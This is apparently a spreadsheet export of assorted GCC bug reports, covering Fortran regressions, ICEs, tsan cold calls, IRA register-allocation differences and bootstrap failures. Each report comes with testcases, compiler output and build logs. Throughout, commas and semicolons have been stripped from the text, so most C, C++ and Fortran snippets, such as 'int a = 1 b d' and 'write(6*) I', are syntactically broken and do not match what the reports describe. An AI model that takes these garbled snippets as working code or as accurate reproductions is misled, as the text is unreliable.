    <t xml:space="preserve">From: Anthony Green 
To: bryce@albatross.co.nz
Cc: java-gnats@sourceware.cygnus.com apbianco@cygnus.com
Subject: gcj/148: Definite assignment problem
Date: Wed 16 Feb 2000 09:48:02 -0800
 Hi Bryce -
 &gt; I narrowed the cause of this down to Anthony's Class Initialization
 &gt; Optimization patch. Removing the patch makes the problem go away.
 Are you saying the toolchain you found the problem in was 20000215+my
 patch?  I don't think I committed it (although I was so tired at the
 end maybe I did by mistake?)
 Thanks
 AG
 -- 
 Anthony Green                                                        Red Hat
                                                        Sunnyvale California
</t>
  </si>
  <si>
    <t>GCC-43111</t>
  </si>
  <si>
    <t>[4.5 Regression] No temporary produced for array pointer actual arguments</t>
  </si>
  <si>
    <t>As reported by Joost VandeVondele this does not compile correctly since my fix for PR41113/7
Paul
SUBROUTINE S2(I)
 INTEGER :: I(4)
 write(6*) I
 IF (ANY(I.NE.(/3579/))) CALL ABORT()
END SUBROUTINE S2
MODULE M1
 TYPE T1
  INTEGER POINTER DIMENSION(:) :: data
 END TYPE T1
CONTAINS
 SUBROUTINE S1()
   TYPE(T1) :: d
   INTEGER TARGET DIMENSION(10) :: scratch=(/(ii=110)/)
   INTEGER :: i=2
   d%data=&gt;scratch(1:9:2)
   write(6*) d%data(i:)
   CALL S2(d%data(i:))
 END SUBROUTINE S1
END MODULE M1
USE M1
CALL S1
END</t>
  </si>
  <si>
    <t>GCC-55488</t>
  </si>
  <si>
    <t>Implement cold calls in tsan run-time</t>
  </si>
  <si>
    <t>The hottest functions in tsan run-time make two cold calls: __tsan_report_race and __tsan_trace_switch
If these calls are implemented via regular calling convention
they ruin the performance since the compiler creates too many spills.
So we've manually implemented a cold-call calling convention using a separate assembly file libsanitizer/tsan/tsan_rtl_amd64.S
Currently this hack is disabled in GCC causing the tsan run-time to be slower than it could be: 
libsanitizer/tsan/tsan_rtl.h: 
#if 0 &amp;&amp; TSAN_DEBUG == 0
...
#define HACKY_CALL(f) \
We need to enable building/linking the file libsanitizer/tsan/tsan_rtl_amd64.S and enable the HACKY_CALL in libsanitizer/tsan/tsan_rtl.h. This will eliminate the only difference left between the gcc version and upstream. 
Or maybe gcc has another way to implement a cold call?</t>
  </si>
  <si>
    <t>GCC-56872</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Incorrect SUM evaluation involving implied-do loop with -ffrontend-optimize</t>
  </si>
  <si>
    <t>The attached code gives the incorrect results when compiled with -ffrontend-optimize (either explicitly or via use of one of the -O flags).
Correct behavior:
$ gfortran -o sum_bug sum_bug.f90
$ ./sum_bug 
   1.00000000       1000.00000    
   1001.00000    
Incorrect behavior (i):
$ gfortran -O2 -o sum_bug sum_bug.f90
$ ./sum_bug 
   1.00000000       1000.00000    
   1.00000005E-03
Incorrect behavior (ii):
$ gfortran -ffrontend-optimize -o sum_bug sum_bug.f90
$ ./sum_bug 
   1.00000000       1000.00000    
         Infinity
gfortran -v gives:
Using built-in specs.
COLLECT_GCC=/Applications/madsdk/bin/gfortran.exec
COLLECT_LTO_WRAPPER=/Applications/madsdk/libexec/gcc/x86_64-apple-darwin11.4.2/4.9.0/lto-wrapper
Target: x86_64-apple-darwin11.4.2
Configured with: ./configure CC='gcc -D_FORTIFY_SOURCE=0' --build=x86_64-apple-darwin11.4.2 --prefix=/Applications/madsdk --with-gmp=/Applications/madsdk --with-mpfr=/Applications/madsdk --with-mpc=/Applications/madsdk --enable-languages=cc++fortran --disable-multilib
Thread model: posix
gcc version 4.9.0 20130404 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-48927</t>
  </si>
  <si>
    <t>Issues with enable attribute and IRA register preferences</t>
  </si>
  <si>
    <t>Trying to merge*vec_concatv4si_1_avx and *vec_concatv4si_1 patterns usign enable attribute gcc.target/i386/pr36246.c test (scan-asm-not for movq
insn) and gcc.target/i386/pr36222-1.c (scan-assembler-not for movdqa) failed with:
FAIL: gcc.target/i386/pr36222-1.c scan-assembler-not movdqa
FAIL: gcc.target/i386/pr36246.c scan-assembler-not movq
Following are the two patterns original (the first one) and merged pattern (the second one). Separate AVX pattern is not relevant to this discussion.
(define_insn *vec_concatv4si_old
 [(set (match_operand:V4SI 0 register_operand       =Y2xx)
       (vec_concat:V4SI
         (match_operand:V2SI 1 register_operand      0 00)
         (match_operand:V2SI 2 nonimmediate_operand  Y2xm)))]
 0
 @
  punpcklqdq\t{%2 %0|%0 %2}
  movlhps\t{%2 %0|%0 %2}
  movhps\t{%2 %0|%0 %2}
 [(set_attr type sselogssemovssemov)
  (set_attr mode TIV4SFV2SF)])
(define_insn *vec_concatv4si
 [(set (match_operand:V4SI 0 register_operand       =Y2xxxx)
       (vec_concat:V4SI
         (match_operand:V2SI 1 register_operand      0 x00x)
         (match_operand:V2SI 2 nonimmediate_operand  Y2xxmm)))]
 TARGET_SSE
 @
  punpcklqdq\t{%2 %0|%0 %2}
  vpunpcklqdq\t{%2 %1 %0|%0 %1 %2}
  movlhps\t{%2 %0|%0 %2}
  movhps\t{%2 %0|%0 %2}
  vmovhps\t{%2 %1 %0|%0 %1 %2}
 [(set_attr isa noavxavxnoavxnoavxavx)
  (set_attr type sselogsselogssemovssemovssemov)
  (set_attr prefix origvexorigorigvex)
  (set_attr mode TITIV4SFV2SFV2SF)])
The problem is that for non-AVX target merged pattern somehow
changes register allocation preferences (please note that all new
constraints are disabled for non-AVX target) so in theory there
should be nothing different However IRA shows certain differences
the diff betwen non-patched (pr36246.c) and patched (pr34246_1.c) IRA
dump files show:
--- pr36246_1.c.190r.ira        2011-05-05 22:06:46.252582018 +0200
+++ pr36246.c.190r.ira  2011-05-05 21:50:07.831975984 +0200
@@ -10010 +1009 @@
  cp1:a1(r68)a5(r62)@125:shuffle
  cp2:a2(r69)a4(r65)@125:shuffle
  cp3:a2(r69)a3(r64)@125:shuffle
-  cp4:a0(r67)a2(r69)@125:shuffle
-  cp5:a0(r67)a1(r68)@125:shuffle
+  cp4:a0(r67)a2(r69)@1000:constraint
  regions=1 blocks=3 points=8
-    allocnos=7 (big 0) copies=6 conflicts=0 ranges=7
+    allocnos=7 (big 0) copies=5 conflicts=0 ranges=7
 **** Allocnos coloring:
@@ -14011 +13911 @@
      Popping a6(r63l0)  -- assign reg 4
      Popping a5(r62l0)  -- assign reg 5
      Popping a0(r67l0)  -- assign reg 21
-      Popping a1(r68l0)  -- assign reg 21
-      Popping a2(r69l0)  -- assign reg 22
+      Popping a1(r68l0)  -- assign reg 22
+      Popping a2(r69l0)  -- assign reg 21
 Disposition:
    5:r62  l0     5    6:r63  l0     4    3:r64  l0     1    4:r65  l0     2
-    0:r67  l0    21    1:r68  l0    21    2:r69  l0    22
+    0:r67  l0    21    1:r68  l0    22    2:r69  l0    21
This results in different allocated registers so the difference
between assembly files shows:
--- pr36246_1.s 2011-05-05 22:06:46.255582628 +0200
+++ pr36246.s   2011-05-05 21:50:07.833976438 +0200
@@ -14 +14 @@
-       .file   pr36246_1.c
+       .file   pr36246.c
       .text
       .p2align 415
       .globl  _mm_set_epi32
@@ -719 +717 @@
 .LFB0:
       .cfi_startproc
       movl    %esi -12(%rsp) # 23    *movsi_internal/2       [length = 4]
-       movd    -12(%rsp) %xmm0        # 24    *movsi_internal/12      [length = 6]
+       movd    -12(%rsp) %xmm1        # 24    *movsi_internal/12      [length = 6]
       movl    %edi -12(%rsp) # 25    *movsi_internal/2       [length = 4]
-       movd    -12(%rsp) %xmm1        # 26    *movsi_internal/12      [length = 6]
+       movd    -12(%rsp) %xmm0        # 26    *movsi_internal/12      [length = 6]
       movl    %ecx -12(%rsp) # 27    *movsi_internal/2       [length = 4]
-       punpckldq       %xmm1 %xmm0    # 9     *vec_concatv2si_sse2/1  [length = 4]
-       movd    -12(%rsp) %xmm1        # 28    *movsi_internal/12      [length = 6]
+       punpckldq       %xmm0 %xmm1    # 9     *vec_concatv2si_sse2/1  [length = 4]
+       movd    -12(%rsp) %xmm0        # 28    *movsi_internal/12      [length = 6]
       movl    %edx -12(%rsp) # 29    *movsi_internal/2       [length = 4]
       movd    -12(%rsp) %xmm2        # 30    *movsi_internal/12      [length = 6]
-       punpckldq       %xmm2 %xmm1    # 10    *vec_concatv2si_sse2/1  [length = 4]
-       movq    %xmm1 %xmm2    # 31    *movv2si_internal_rex64/10      [length = 4]
-       punpcklqdq      %xmm0 %xmm2    # 11    *vec_concatv4si/1       [length = 4]
-       movdqa  %xmm2 %xmm0    # 32    *movv4si_internal/2     [length = 4]
-       ret     # 35    return_internal [length = 1]
+       punpckldq       %xmm2 %xmm0    # 10    *vec_concatv2si_sse2/1  [length = 4]
+       punpcklqdq      %xmm1 %xmm0    # 11    *vec_concatv4si_1/1     [length = 4]
+       ret     # 33    return_internal [length = 1]
       .cfi_endproc
 .LFE0:
       .size   _mm_set_epi32 .-_mm_set_epi32
This triggers the scan-asm-not scanner failure pointing to the
interference between enable attribute and IRA. I believe that the
intention of enable attribute is to maintain consistency between
separate patterns and merged patterns in all stages of compilation.</t>
  </si>
  <si>
    <t>GCC-32423</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/20020604-1.c ICEs</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/20020604-1.c ICEs if compiled with
-O3 -fomit-frame-pointer -mcpu=5485.
Here is a reduced testcase min.c.
unsigned int
foo (unsigned int n)
{
  float c[8192]
  unsigned int i
  unsigned int d = 0
  union {
    float r
    unsigned int i
  } e
  for (i = 0 i &lt; n i++)
    {
      e.r = c[i]
      d = e.i
    }
  return d
}
I get:
$ ./cc1 -quiet -O3 -fomit-frame-pointer -mcpu=5485 min.c
min.c: In function 'foo':
min.c:17: error: insn does not satisfy its constraints:
(insn 42 73 43 5 min.c:13 (set (mem/s/c:SF (plus:SI (reg/f:SI 15 %sp)
                (reg:SI 2 %d2)) [0 e.r+0 S4 A16])
        (mem/s:SF (post_inc:SI (reg:SI 8 %a0 [orig:55 ivtmp.30 ] [55])) [3 c S4 A16])) 46 {movsf_cf_hard} (expr_list:REG_INC (reg:SI 8 %a0 [orig:55 ivtmp.30 ] [55])
        (nil)))
min.c:17: internal compiler error: in reload_cse_simplify_operands at postreload.c:396
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
A quick analysis shows that the following appears in min.c.172r.greg.
(insn 42 73 43 5 min.c:13 (set (mem/s/c:SF (plus:SI (reg/f:SI 15 %sp)
                (reg:SI 2 %d2)) [0 e.r+0 S4 A16])
        (mem/s:SF (post_inc:SI (reg:SI 8 %a0 [orig:55 ivtmp.30 ] [55])) [3 c S4 A16])) 46 {movsf_cf_hard} (expr_list:REG_INC (reg:SI 8 %a0 [orig:55 ivtmp.30 ] [55])
        (nil)))
Notice that SET_SRC has an address of the form SP + D2 which is
invalid on ColdFire.</t>
  </si>
  <si>
    <t>GCC-8801</t>
  </si>
  <si>
    <t>[x86-64] segfaults in build_class_member_access_expr</t>
  </si>
  <si>
    <t>cc1plus segfaults in build_class_member_access_expr because it gets passed a null pointer as member when compiling the attached adjustment.ii:
adjustment.ii: In member function `void Gtk::Adjustment::set_lower(float)':
adjustment.ii:41330: internal compiler error: Segmentation fault
the problem is this code:
  void set_lower(gfloat lower) {
          gtkobj()-&gt;lower = lower changed()
  }
public:
  union
    {
      CppObjectType * adjustment_self
      Gtk::EmitProxySignal0&lt;voidCppObjectTypeBaseObjectType0
      Gtk::EmitProxySignal0 value_changed
    }
specifically the unnamed union. If you change the code to use a named union it compiles without problem.
Release:
GNU C++ version 3.3-hammer 20021125 (experimental)
Environment:
i686-suse-linux
How-To-Repeat:
Compile attached file.</t>
  </si>
  <si>
    <t>GCC-18833</t>
  </si>
  <si>
    <t>ICE 'missing spec' on integer/char equivalence</t>
  </si>
  <si>
    <t>I haven't seen this one before...
$ cat integer-char.f90
program main
  character(len=8) :: c
  integer dimension(2) :: i
  equivalence(c(1:1) i(1))
end program main
$ gfortran integer-char.f90
 In file integer-char.f90:5
end program main
               1
 Internal Error at (1):
 find_array_spec(): Missing spec
$ gfortran -v
Reading specs from /home/ig25/lib/gcc/i686-pc-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --prefix=/home/ig25
--enable-languages=cc++f95 --disable-shared
Thread model: posix
gcc version 4.0.0 20041204 (experimental)</t>
  </si>
  <si>
    <t>GCC-9138</t>
  </si>
  <si>
    <t>[3.4 Regression] New C++ parser regression on mips-irix6 with g++.jason/thunk1.C (and thunk2.C/thunk3.C)</t>
  </si>
  <si>
    <t>I get these new testsuite failures on mips-sgi-irix6.5 which appear to be related:
FAIL: g++.jason/thunk1.C caused compiler crash
FAIL: g++.jason/thunk2.C caused compiler crash
FAIL: g++.jason/thunk3.C caused compiler crash
The logfile message for all three looks like this:
thunk1.C: In member function `A CExample::_ZThn4_N8CExample9MixinFuncEi1A(int A)':
thunk1.C:33: internal compiler error: tree check: expected tree_list have function_decl in friend_accessible_p at cp/search.c:954
Release:
gcc version 3.4 20030101 (experimental)
Environment:
mips-sgi-irix6.5
How-To-Repeat:
Compile thunk1.ii with:
cc1plus -fpreprocessed thunk1.ii -quiet -dumpbase thunk1.C -ansi -auxbase thunk1 -pedantic-errors -Wno-long-long -ansi -version -fmessage-length=0 -o thunk1.s
# 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030102/gcc/testsuite/g++.old-deja/g++.jason/thunk1.C
# 1 
# 1 
# 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030102/gcc/testsuite/g++.old-deja/g++.jason/thunk1.C
struct A {
  void* p
  A (void* q): p (q) { }
  A (const A&amp; a): p (a.p) { }
}
class CBase {
public:
  virtual void BaseFunc()
}
class MMixin {
public:
   virtual A MixinFunc(int arg A arg2) = 0
}
class CExample : public CBase public MMixin {
public:
   A MixinFunc(int arg A arg2)
}
void CBase::BaseFunc()
{
}
A CExample::MixinFunc(int arg A arg2)
{
  if (arg != 1 || arg2.p != 0)
    return 0
  return this
}
void* test(MMixin&amp; anExample)
{
  return anExample.MixinFunc(1A(0)).p
}
int main ()
{
  CExample c
  if (test(c) != &amp;c)
    return 1
}</t>
  </si>
  <si>
    <t>GCC-37655</t>
  </si>
  <si>
    <t>Error Building libgcc_s.dll</t>
  </si>
  <si>
    <t>$ uname -a
CYGWIN_NT-5.1 MCKELVEY-XP 1.5.25(0.156/4/2) 2008-06-12 19:34 i686 Cygwin
$ g++ -v
Using built-in specs.
Target: i686-pc-cygwin
Configured with: /cygdrive/f/Home/cvsroot/gcc/configure --verbose --enable-threads --disable-nls --disable-win32-registry --enable-languages=cc++
Thread model: posix
gcc version 4.4.0 20080826 (experimental) (GCC) 
$ alias CONFIGURECVS
alias CONFIGURECVS='/cygdrive/f/Home/cvsroot/gcc/configure     --verbose --enable-threads --disable-nls     --disable-win32-registry --enable-languages=cc++ 2&gt;&amp;1 | tee clog'
$ alias BUILD
alias BUILD='nice make CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g -O'\''     CXXFLAGS='\''-O'\'' LIBCXXFLAGS='\''-g -O'\''     bootstrap 2&gt;&amp;1 | tee log'
# @multilib_flags@ is still needed because this may use
# /cygdrive/f/Home/cvsroot/gcc-obj/./gcc/xgcc -B/cygdrive/f/Home/cvsroot/gcc-obj/./gcc/ -B/usr/local/i686-pc-cygwin/bin/ -B/usr/local/i686-pc-cygwin/lib/ -isystem /usr/local/i686-pc-cygwin/include -isystem /usr/local/i686-pc-cygwin/sys-include and -O2 -I/cygdrive/f/Home/cvsroot/gcc/gcc/../winsup/w32api/include -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition  -isystem ./include   -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  directly.
# @multilib_dir@ is not really necessary but sometimes it has
# more uses than just a directory name.
/bin/sh /cygdrive/f/Home/cvsroot/gcc/libgcc/../mkinstalldirs .
ln -s libgcc.map libgcc.map.def  then mkdir ./shlib else true fi  then mv -f ./shlib/libgcc_s_1.dll ./shlib/libgcc_s_1.dll.backup else true fi &amp;&amp; mv ./shlib/libgcc_s_1.dll.tmp ./shlib/libgcc_s_1.dll &amp;&amp; mv ./shlib/libgcc_s.a.tmp ./shlib/libgcc_s.a
ln: creating symbolic link `libgcc.map.def': File exists
make[3]: *** [libgcc_s.dll] Error 1
make[3]: Leaving directory `/cygdrive/f/Home/cvsroot/gcc-obj/i686-pc-cygwin/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/cygdrive/f/Home/cvsroot/gcc-obj'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/cygdrive/f/Home/cvsroot/gcc-obj'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-15433</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE cannot split insn</t>
  </si>
  <si>
    <t>$ g++ -O1 bug.ii
glinterface.cc: In function `void gluGetNurbsProperty(GLUnurbs* GLenum GLfloat*)':
glinterface.cc:426: error: could not split insn
(insn 337 356 338 (set (reg:SF 22 xmm1)
        (if_then_else:SF (ne (mem:SF (plus:SI (reg/f:SI 6 bp)
                        (const_int -8 [0xfffffff8])) [0 nurbsValue+0 S4 A32])
                (reg:SF 22 xmm1))
            (const_double:SF 0 [0x0] 0.0 [0x0.0p+0])
            (reg:SF 21 xmm0 [80]))) 491 {*sse_movsfcc_const0_4} (nil)
    (expr_list:REG_DEAD (reg:SF 21 xmm0 [80])
        (expr_list:REG_EQUIV (mem:SF (reg/v/f:SI 3 bx [orig:71 value ] [71]) [0
S4 A32])
            (nil))))
glinterface.cc:426: internal compiler error: in final_scan_insn at final.c:2508
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ g++ --version | grep GCC
g++ (GCC) 3.5.0 20040514 (experimental)</t>
  </si>
  <si>
    <t>GCC-7477</t>
  </si>
  <si>
    <t>Array type decays too quickly</t>
  </si>
  <si>
    <t>Consider the following code:
#include 
#include 
#include 
namespace base
{
   struct string : public ::std::string
   {
      template
      string( const T&amp; s )
            : ::std::string( s sizeof( s ) / sizeof( *s ) - 1 )
      {
         std::cout &lt;&lt; typeid( T ).name() &lt;&lt; std::endl
      }
   }
}
void f( const base::string&amp; s ) 
{
   std::cout &lt;&lt; s &lt;&lt; std::endl
}
int main()
{
   base::string s = Hello world!
   std::cout &lt;&lt; s &lt;&lt; std::endl
   f( Hello world! )
}
The output for the GCC 3.1 is:
A14_c
Hello world!
PKc
Hel
Which is IMHO not correct. The base::string that is taken by f() should get the same type as the explicitly constructed base::string. For further discussion see the thread in csc++ where James Kanze also provided some references to the standard. I am not sure if it really is a bug but if it isn't please show me a reference to the standard which makes it legal to throw away the type information. :)
Regards Daniel
Release:
unknown
Environment:
linux gcc 3.1</t>
  </si>
  <si>
    <t>GCC-51278</t>
  </si>
  <si>
    <t>gcc.target/mips/octeon-baddu-1.c fails on the trunk</t>
  </si>
  <si>
    <t>The issue is a target cost issue:
Trying 7 -&gt; 13:
Successfully matched this instruction:
(set (reg/i:DI 2 $2)
    (zero_extend:DI (truncate:QI (plus:DI (reg:DI 5 $5 [ b ])
                (reg:DI 4 $4 [ a ])))))
rejecting combination of insns 7 and 13
original costs 4 + 4 = 8
replacement cost 12
The replacement cost should be 4.</t>
  </si>
  <si>
    <t>GCC-1477</t>
  </si>
  <si>
    <t>PR gcj/92</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Bogus PR I accidentally created.
</t>
  </si>
  <si>
    <t>GCC-82598</t>
  </si>
  <si>
    <t>[8 Regression] lto debugobj lacks .note.GNU-stack</t>
  </si>
  <si>
    <t>Lack of a .note.GNU-stack section results in ld testsuite failures:
arm-linuxeabi  FAIL: PR ld/12982
hppa-linux  FAIL: PR ld/12982
m68k-linux  FAIL: PR ld/12982
powerpc-linux  FAIL: PR ld/12982
s390-linux  FAIL: PR ld/12982
s390x-linux  FAIL: PR ld/12982
sparc64-linux  FAIL: PR ld/12982
x86_64-linux  FAIL: PR ld/12982
Reproducible with -g -O2 -flto -fuse-linker-plugin on
int main () { return 0 }
readelf -l a.out</t>
  </si>
  <si>
    <t>GCC-52073</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: vector VEC(vec_void_pbase) index domain error in vinfo_for_stmt at tree-vectorizer.h:620</t>
  </si>
  <si>
    <t>[regehr@gamow tmp]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r183767-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r183767-install --program-prefix=r183767- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20120131 (experimental) (GCC) 
[regehr@gamow tmp]$ current-gcc -Ofast small.c
small.c: In function 'fn8':
small.c:28:1: internal compiler error: vector VEC(vec_void_pbase) index domain error in vinfo_for_stmt at tree-vectorizer.h:620
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow tmp]$ cat small.c
int c
int
fn3 ()
{
  return c
}
int d
int
fn4 (ui2)
{
  d = ui2
  return 0 == d
}
struct S0
{
}
int e
int f
int g
int h
static unsigned long long fn5 (unsigned char)
void fn6 (struct S0)
void fn7 ()
struct S0 j
void
fn8 ()
{
  fn6 (j)
  fn5 (0)
}
unsigned long long
fn5 (unsigned char p_7)
{
  for ( h--)
    fn7 ()
}
void
fn6 (struct S0 p_16)
{
  e = 1
}
int m
int n
void
fn7 ()
{
  int p
lbl_140:p = fn3 ()
  if (f)
    {
      if (e)
	goto lbl_140
      for ( m)
	--g
    }
  else
    for (n = 5 n n--)
      p = fn4 (p)
  if (p)
    {
    }
  else
    f = 0
}</t>
  </si>
  <si>
    <t>GCC-80875</t>
  </si>
  <si>
    <t>[7 Regression] UBSAN: compile time crash in fold_binary_loc at fold-const.c:9817</t>
  </si>
  <si>
    <t xml:space="preserve">gcc rev248384 x86_64.
&gt; cat f.cpp
void foo() {
    ~2147483647 * (0 / 0)
}
&gt; g++ -fsanitize=undefined -w -c f.cpp
f.cpp: In function â€˜void foo()â€™:
f.cpp:3:1: internal compiler error: tree check: expected class â€˜constantâ€™ have â€˜unaryâ€™ (negate_expr) in fold_binary_loc at fold-const.c:9817
 }
 ^
0x10384a7 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc_svn/gcc/tree.c:9909
</t>
  </si>
  <si>
    <t>GCC-39664</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 145571 breaks stdio</t>
  </si>
  <si>
    <t>On Linux/ia32 and Linux/x86-64 revision 145573 gave:
  Running 436.cactusADM ref base o2 default
Error with '/export/gnu/import/svn/gcc-test/spec/2006/x86_64/spec/bin/specinvoke
 -E -d /export/gnu/import/svn/gcc-test/spec/2006/x86_64/spec/benchspec/CPU2006/4
36.cactusADM/run/run_base_ref_o2.0000 -c 1 -e compare.err -o compare.stdout -f c
ompare.cmd': check file '/export/gnu/import/svn/gcc-test/spec/2006/x86_64/spec/b
enchspec/CPU2006/436.cactusADM/run/run_base_ref_o2.0000/.err'
*** Miscompare of benchADM.out see /export/gnu/import/svn/gcc-test/spec/2006/x8
6_64/spec/benchspec/CPU2006/436.cactusADM/run/run_base_ref_o2.0000/benchADM.out.
mis</t>
  </si>
  <si>
    <t>GCC-51006</t>
  </si>
  <si>
    <t>bootstrap fails on NetBSD 5.1</t>
  </si>
  <si>
    <t>enable-execute-stack.c:74:1: error: static declaration of 'getpagesize' follows non-static declaration
In file included from enable-execute-stack.c:26:0:
/usr/include/unistd.h:248:3: note: previous declaration of 'getpagesize' was here
enable-execute-stack.c:33:13: warning: 'check_enabling' declared 'static' but never defined [-Wunused-function]
gmake[2]: *** [enable-execute-stack.o] Error 1
gmake[2]: Leaving directory `/home/jwakely/build/x86_64-unknown-netbsd5.1/libgcc'</t>
  </si>
  <si>
    <t>GCC-59221</t>
  </si>
  <si>
    <t>[4.9 Regression] wrong code at -O2 and -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -O2 and -O3 in both 32-bit and 64-bit modes. 
This is a regression from 4.8.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --disable-werror --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20131120 (experimental) [trunk revision 205097] (GCC) 
$ 
$ gcc-trunk -Os small.c a.out
$ gcc-4.8.2 -O2 small.c a.out
$ 
$ gcc-trunk -O2 small.c a.out
Aborted (core dumped)
$ 
-----------------------
int a = 1 b d
short e
int
main ()
{
  for ( b b++)
  short f = a
  int g = 15
  e = f ? f : 1 &lt;&lt; g
  int h = e
  d = h == 83647 ? 0 : h
  if (d != 1)
    __builtin_abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-8233</t>
  </si>
  <si>
    <t>gcc-3.2 with freebsd as target</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi.
 I'm having problem compiling a gcc-3.2 to create freebsd binaries on a
 Linux machine.
 I configure with $srcdir/configure --target=i386-freebsd4 --with-gnu-ld
 --with-gnu-as after I've compiled and installed binutils-2.13 with same
 target and copied the contents of /usr/include on a FreeBSD machine to
 /usr/local/i386-freebsd4/include and /usr/lib contents from the FreeBSD
 machine to /usr/local/i386-freebsd4/lib.
 The problem is with the headers gcc uses when it gets *freebsd4 as a
 target.
 Look:
 Making all in src
 make[3]: Entering directory
 `/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/src'
 /bin/sh ../libtool --tag CXX --mode=compile /usr/src/gcc-objdir/gcc/xgcc
 -shared
 -libgcc -B/usr/src/gcc-objdir/gcc/ -nostdinc++
 -L/usr/src/gcc-objdir/i386-freeb
 sd4/libstdc++-v3/src
 -L/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/src/.libs
 -B/usr/local/i386-freebsd4/bin/ -B/usr/local/i386-freebsd4/lib/ -isystem
 /usr/lo
 cal/i386-freebsd4/include -nostdinc++
 -I/usr/src/gcc-objdir/i386-freebsd4/libstd
 c++-v3/include/i386-freebsd4
 -I/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/in
 clude -I/usr/local/cross/src/gcc-3.2/libstdc++-v3/libsupc++
 -I/usr/local/cross/
 src/gcc-3.2/libstdc++-v3/libmath    -g -O2 -fno-implicit-templates  -Wall
 -Wno-f
 ormat -W -Wwrite-strings -Winline  -fdiagnostics-show-location=once  -g
 -c /u
 sr/local/cross/src/gcc-3.2/libstdc++-v3/src/globals.cc
 mkdir .libs
 /usr/src/gcc-objdir/gcc/xgcc -shared-libgcc -B/usr/src/gcc-objdir/gcc/
 -nostdinc
 ++ -L/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/src
 -L/usr/src/gcc-objdir/i3
 86-freebsd4/libstdc++-v3/src/.libs -B/usr/local/i386-freebsd4/bin/
 -B/usr/local/
 i386-freebsd4/lib/ -isystem /usr/local/i386-freebsd4/include -nostdinc++
 -I/usr/
 src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4
 -I/usr/src/gcc-o
 bjdir/i386-freebsd4/libstdc++-v3/include
 -I/usr/local/cross/src/gcc-3.2/libstdc+
 +-v3/libsupc++ -I/usr/local/cross/src/gcc-3.2/libstdc++-v3/libmath -g -O2
 -fno-i
 mplicit-templates -Wall -Wno-format -W -Wwrite-strings -Winline
 -fdiagnostics-sh
 ow-location=once -g -c
 /usr/local/cross/src/gcc-3.2/libstdc++-v3/src/globals.cc
  -fPIC -DPIC -o .libs/globals.o
 In file included from
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/bit
 s/locale_facets.h:63
                  from
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/bit
 s/basic_ios.h:41
                  from
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/ios
 :51
                  from
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/ist
 ream:44
                  from
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/fst
 ream:45
                  from
 /usr/local/cross/src/gcc-3.2/libstdc++-v3/src/globals.cc:3
 0:
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:46: `
    _U' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:47: `
    _L' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:48: `
    _U' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:48: `
    _L' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:49: `
    _N' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:50: `
    _X' was not declared in this scope
